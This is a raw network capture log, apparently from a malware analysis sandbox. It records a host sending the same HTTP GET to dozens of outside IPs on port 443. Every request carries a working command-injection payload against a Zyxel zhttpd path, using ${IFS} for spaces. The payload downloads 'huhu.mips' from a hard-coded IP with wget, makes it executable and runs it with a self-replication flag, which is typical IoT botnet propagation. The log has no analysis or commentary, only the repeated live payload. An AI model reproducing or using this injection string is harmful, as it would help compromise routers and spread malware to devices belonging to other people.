                                            Feb 2, 2024 06:21:02.437117100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1810192.168.2.1559252156.124.57.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437155008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1811192.168.2.1546232153.201.85.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437197924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1812192.168.2.155822031.145.188.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437228918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1813192.168.2.1560068179.158.2.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437261105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1814192.168.2.1537100159.30.206.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437309027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1815192.168.2.1557760112.235.199.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437335968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1816192.168.2.1533788193.213.221.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437387943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1817192.168.2.155078075.165.226.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437408924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1818192.168.2.156050666.50.252.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437449932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1819192.168.2.155432051.237.80.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437516928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1820192.168.2.1546230204.231.24.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437540054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1821192.168.2.1539274123.89.23.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437556028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1822192.168.2.155164863.206.85.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437592030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1823192.168.2.1553046139.75.81.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437624931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1824192.168.2.153593252.159.246.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437654972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1825192.168.2.1557416133.113.94.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437694073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1826192.168.2.1557452189.150.208.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437724113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1827192.168.2.1560212152.252.13.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437771082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1828192.168.2.1559180210.113.216.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437804937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1829192.168.2.1560772192.86.206.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437840939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1830192.168.2.154154647.196.135.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437865019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1831192.168.2.1539588155.221.180.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437908888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1832192.168.2.153903676.242.52.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437944889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1833192.168.2.1535788200.87.60.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.437977076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1834192.168.2.1542134206.43.236.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438008070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1835192.168.2.156084283.34.37.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438050985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1836192.168.2.1548068130.89.100.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438083887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1837192.168.2.1541382197.155.34.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438113928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1838192.168.2.153447683.11.103.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438148975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1839192.168.2.1545332118.253.234.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438200951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1840192.168.2.1540066200.153.111.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438247919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1841192.168.2.1540822168.23.68.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438273907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1842192.168.2.1541166120.129.205.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438338995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1843192.168.2.153719477.25.110.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438348055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1844192.168.2.1534996203.103.214.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438404083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1845192.168.2.154488073.21.253.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438455105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1846192.168.2.1536418185.96.218.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438481092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1847192.168.2.154427654.201.14.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438497066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1848192.168.2.153716643.53.76.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438538074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1849192.168.2.1545420105.216.114.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438590050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1850192.168.2.1560336157.177.181.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438633919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1851192.168.2.1540924192.150.249.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438656092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1852192.168.2.1556498162.91.60.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438694000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1853192.168.2.155523251.254.240.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438724995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1854192.168.2.1547462145.154.66.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438761950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1855192.168.2.153572697.132.125.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438791990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1856192.168.2.154886076.129.242.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438824892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1857192.168.2.1554646114.20.222.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438857079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1858192.168.2.154130845.147.14.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438890934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1859192.168.2.155230893.242.178.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438925982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1860192.168.2.1552330121.250.61.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438954115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1861192.168.2.1542512184.41.167.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.438998938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1862192.168.2.1555198120.194.235.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439035892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1863192.168.2.1537578131.74.113.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439081907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1864192.168.2.1560534116.103.224.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439107895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1865192.168.2.1560660184.104.119.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439140081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1866192.168.2.155736275.160.18.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439196110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1867192.168.2.153916046.60.128.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439222097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1868192.168.2.154465295.77.185.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439270020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1869192.168.2.1551094185.89.50.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439305067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1870192.168.2.154569876.187.220.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439330101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1871192.168.2.153496214.152.11.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439385891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1872192.168.2.1535000141.49.229.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439436913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1873192.168.2.15417064.128.174.200443
                                            TimestampBytes transferredDirectionData
